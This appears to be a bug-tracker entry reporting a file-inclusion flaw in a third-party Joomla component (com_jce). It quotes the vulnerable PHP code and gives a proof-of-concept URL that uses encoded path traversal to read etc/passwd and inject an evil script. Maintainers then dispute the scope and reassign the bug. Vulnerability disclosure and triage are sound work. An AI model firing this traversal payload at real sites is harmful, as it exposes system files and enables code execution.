com_jce component in jce.php ... switch ( $task ) { case 'popup': showPopup(); break; case 'plugin': ... look case 'plugin' !!! $plugin = cleanInput( mosGetParam( $_REQUEST, 'plugin' ) ); if( in_array( $plugin, $plugins ) ){ $file = cleanInput( basename( mosGetParam( $_REQUEST, 'file' ) ) ); $path = $mainframe->getCfg('absolute_path') . '/mambots/editors/jce/jscripts/tiny_mce/plugins/' . $plugin; if( is_dir( $path ) && file_exists( $path . '/' . $file ) ){ include_once $path . '/' . $file; We can include evil script. &task=plugin&plugin=..%3C%3E/%3C...%3C///..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////etc&file=passwd&path= POC: http://www.website.dom/modules/mod_ajaxtabs_orthopal/index2.php?option=com_jce&task=plugin&plugin=..%3C%3E/%3C...%3C///..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////etc&file=passwd&path=[EVILSCRIPT] all joomla version is vulnerable, i thnk mambo too. just try :P
upstram (joomla) mailed.
Joomla has never been marked stable on any security supported architecture, so the security team wont handle this bug. It looks like that file is some random third party extension http://extensions.joomla.org/component/option,com_mtree/task,viewlink/link_id,1157/Itemid,35/ There is no jce.php in joomla-1.0.11.tar.bz2, and the string "com_jce" doesnt appear once in the joomla distribution, afaict Reassigning to web-apps...
file upstream
